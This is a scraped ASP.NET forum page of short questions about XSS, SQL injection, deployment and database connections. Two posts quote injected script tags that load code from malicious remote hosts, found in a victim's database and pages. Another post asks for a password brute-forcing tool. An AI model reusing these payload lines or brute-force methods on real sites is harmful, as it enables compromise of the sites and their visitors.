Sql Server - XSS Attack On The Website
Sep 23, 2010
My website has been attacked by some malicious script < / title> < script src = http : // google-stats50.info/ur.php >. This script is appended to any column(s) of some table automatically. I have removed this script. But after a few hours, it re-appeared in some tables. But this time it is < / title> < script src = http : // google-stats49.info/ur.php >.My client is complaining about the script. Technology used is ASP.NET 1.1, SQL SERVER 2005.
View 6 Replies
Similar Messages:
Nov 1, 2010
I'm using a literal to display some javascript on a product page control. Basically what I'm doing is in my code behind I'm declaring a new stringbuilder, writing the script while inserting some dynamic variables to populate the script then setting the literal text to the stringbuilder. This leaves me open to xss attacks. What can I do to prevent this?
System.Text.StringBuilder sb = new System.Text.StringBuilder();
//loop through items in the collection
for (int i = 0; i < _prod.ActiveProductItemCollection.Count; i++)
{
sb.Append("<script type='text/javascript'>");
//add +1 to each item
sb.AppendFormat("mboxCreate("product_productpage_rec{0}",", i+1);
[code]...
View 4 Replies
Jun 21, 2010
Can asp.net Dropdownlist and validating they safely protect against SQL injection attack ??
View 7 Replies
Nov 26, 2010
I have a textBox and a property to get and set its value:
public SomeText
{
get { return HttpUtility.HtmlEncode(textBox.Text); }
set { textBox.Text = HttpUtility.HtmlEncode(value); }
}
I have used HtmlEncode to prevent Javascript injection attacks. After thinking about it though I'm thinking I only need the HtmlEncode on the getter. The setter is only used by the system and can not be accessed by an external user.
View 2 Replies
Oct 15, 2010
a major problem from Cross-Site ScriptingAttack, Below is sample script which automatically gets inserted into my HTML and ASPX Pages.
"<script src=http://avidmarketing.ie/images/rc3/companybuttonwhite.php ></script>"
View 5 Replies
Jun 8, 2010
I am looking for something that takes an IIS/ASP.NET website that uses forms authentication and repeatedly tries to log in, either with all possible passwords or with passwords from a dictionary.
I can probably write something up, but I wondered if there was anything publicly available that would be better implemented.
View 3 Replies
Jul 1, 2010
Is the DetailsView control generally safe from SQL injection attacks if the EDIT mode is displayed?
View 3 Replies
Nov 6, 2010
My host moved my website to a new server. The DNS configuration is correct but the website is still down and I'm getting this message
"unable to open website at www.aboutmecfs.org. Internal Server error"
View 9 Replies
Feb 19, 2011
I'm trying to run a website (site2) that I've placed inside a folder (dir-site2) of another website (site1). The default file of site2 displays fine in every browser on my local computer, as in when I type http://localhost:45912/www.site1.com/dir-site2/default.aspx. But when I upload everything to my host's server and type this
http://www.site1.com/dir-site2/default.aspx I get a server "can't access" error message. I can't display any file that is inside the subdirectory, dir-site2.
View 2 Replies
Mar 7, 2011
Is it possible that the entire website can be created in Server Script(C# or VB)?
View 4 Replies
Mar 7, 2011
I have a site that is running on a Windows Server 2008 machine with IIS 7.0, when I try to open it with Visual Web Developer 2010, it says the following:
error: unable to open site: ... The Web server does not appear to have FrontPage Server Extensions installed.
Looking on the server Frontpage Extensions 2002 are installed, so what could be wrong?
The thing is, I used to be able to open the project and work on it, etc...
Open Website -> Remote Site -> Enter remote site name -> tries to open & error above!
View 1 Replies
Sep 1, 2010
how to deploy ASP.net Website having SQL Server on IIS server on Different Computer..
View 2 Replies
Dec 10, 2010
I built an ASP.NET 4.0 Web Site. It works perfectly on my development computer. However, when I deploy the web site to theProduction Server, which is a Win2003 Small Business with Sql Server 2000, the site can't connect to the database.
These are the different tests I've made:
I tried using Integrated Windows authentication and this connection string: Data Source=myServerAddress;Initial Catalog=myDataBase;Integratedsecurity=true; and the error I got was that NT Authority/Network Service couldn't open the database. So I added that account to my database users list and gave it the appropiate permissions. Nothing.I tried using Sql Server authentication, so I created a new database user with a password and changed my connection string toData Source=myServerAddress;Initial Catalog=myDataBase;User Id=myUsername;Password=myPassword;. Nothing. I still got the same NT Authority user message.I deleted the used I created in step 2 and used the same connection string, to see if this time I got an error saying something about my user, and indeed it happened. I got an exception saying that user myUsername couldn't log on. I then created the user again, ang got the NT Authority user message one more time.I created a console application that used the same connection string from steps 2 and 3, and it connected to the database witouth any problem, which made me think that my problem's got something to do with my Web.config.I tried enabling impersonation on my Web.config, and thos time I got the same error message, only referring to the user I logged in to Windows, instead of NT Authority/Network service. What else could I check? My Web.config is this in case it helps (I havn't really put anything into it other than what VS puts):
[Code]....
View 10 Replies
Sep 30, 2010
I created a virtual directory on the new server and I pointed to the location on the server where the webpages are located.
I keep getting this error:Compiler Error Message: CS1705: Assembly 'ClassLib, Version=1.0.0.0, Culture=neutral, PublicKeyToken=dd83483ddbd7ed99' uses 'Oracle.DataAccess, Version=10.1.0.400, Culture=neutral, PublicKeyToken=89b483f429c47342' which has a higher version than referenced assembly 'Oracle.DataAccess, Version=1.111.6.0, Culture=neutral, PublicKeyToken=89b483f429c47342'
ClassLib is a dll that is referenced within my site that has functions that were created within it.Within ClassLib there is a reference to the old oracle version. My new server has version 11. Will I have to install version 11 and reference that version within
ClassLib and then recompile and add the new dll to my bin directory?
View 2 Replies
Sep 15, 2010
I meet a problem and an error:
Cannot open database "dbTest" requested by the login. The login failed.
Login failed for user 'machinename'.
The condition is like this:
1 I make my website connect to a remote sql server.
2 This sql server makes only access to a count, such as 'sa' and its password is 'sapw'
3 I write the connect string in web.config like this :
[code]....
But the error says "Login failed for user 'machinename'". How could I make my website access to the sql server with the account of "sa"?
View 1 Replies
Feb 26, 2011
1 new website attach with existing website..where attached website is behave as pluggable. and used anywhere in any website?
View 7 Replies
Feb 24, 2011
i want to run asp.net website on apache server instead of IIS.i googled a lot, but din get satisfactory answers.i only came to know that we can use something called 'mono' - third party api for doing this.i want to knw some basic things like do we need to install .net framework on that server?what if its a unix server?
View 3 Replies
Mar 9, 2011
I understood, that I need to use mod_aspdotnet, but I can't find this module for ASP.Net(4.0) - only for 2.0.
View 3 Replies
Mar 22, 2010
I am using Visual Web Developer 2008.
Having built my website in the development environment, I would like to FTP it to my production environment, using Copy Website.
When I click Copy Website, the FTP Log On window opens, but the FTP server address is incorrect.
How do I change the FTP server address?
View 1 Replies
Oct 24, 2010
We are bulding an intranet for our company. Just to do things like log support calls, keep details of customers servers, computers etc.
What i want to do is have a table that will record changes for each page. If we have the servers table, if somebody updates the ipaddress i would like it to log the previous value, the date and time, the user that did it, the new value and what table and field they changed. Is this kind of thing possible? i would imagine i would need some code that would execute on the insert command that would programatically insert the details into the changes table.
View 1 Replies
Mar 30, 2011
There are 2 web-servers involved:
Webserver1 has been in the organization a few years and is hosting/running multiple websites with https encryption (app1.ourcompany.com, app2.ourcompany.com, etc). It has a valid, signed certificate.
Webserver2 is a new server, for which I am responsible. I am tasked with setting up https and getting the certificate, etc. It has a web app running on it, but it does not have a domain name (only has an IP address)...which as I recently learned, is a requirement for a signed certificate.
What I'd like to know is this -- is it possible to set up a site on Webserver1 that points to the site I'm hosting on Webserver2 (ie SiteOnWebserver2.ourcompany.com) which also utilizes the Webserver1's signed/verified certificate?
View 1 Replies
Aug 21, 2010
I am new to the web development.I have built my website in visual studio 2008 using Sql server 2008 as backend.Now I want to know the whole process of deploying the website in some web domains and as well as my database to some database domain.I didn't purchase any domain till now.I want to know about web hosting as well.
View 2 Replies
Sep 30, 2010
I need to deploy a website from the SVN to different servers all within our own network. The code is currently not complied but probably will be in the future.
First the site would need to be deployed to the development server for the developers to test.
Once the Developer signs off it would be deployed to the staging server for the testers.
Once final sign off was given it would be deployed to a server farm, two live servers.
Each server has a couple of settings in the web.config to that are different; expect the two live server of course. I would like to use templates, the way the Ruby on Rails world does, seems like an elegant solution to multiple web.config files.
I also need to create a list/report of the files that were changed and what the change was since the last deployment.
I thinking of writing a script that will do the following
1. Take args for server to deploy to, and revision
2. Export a copy of the source to a directory with svn export -r <deploy revision>
3. Delete the web.config file
4. Use ttree (a template tool [URL]) to create the correct web.config
5. Create a list of file changes with svn list -r <deploy revision>:<current server revision>
6. Stores the <current server revision> of the website for when the script is run next time
I prefer to use tools that are already available rather than re-invent the wheel. Unfortunately I don't think MSDeploy will do what I need, but I'm happy to use it, or anything else, if it will do what I need it to. Does anyone know of any tools that are up to the task or is the script my only option?
View 1 Replies
Apr 16, 2010
My question is the same as my subject: how to put asp.net website with sql server database online.
I've never done this on my own before so can anyone explain it?
Where can i put it online and so on..
bob3s
View 7 Replies
Sep 27, 2010
i have few websites on servers around the world that run a certein function and i want that the site will send the output directly to my computer (no neccessary my computer, it can be my other website that is located in my country, the important thing is that the data will arrive form the site to my location on the globe).
View 2 Replies
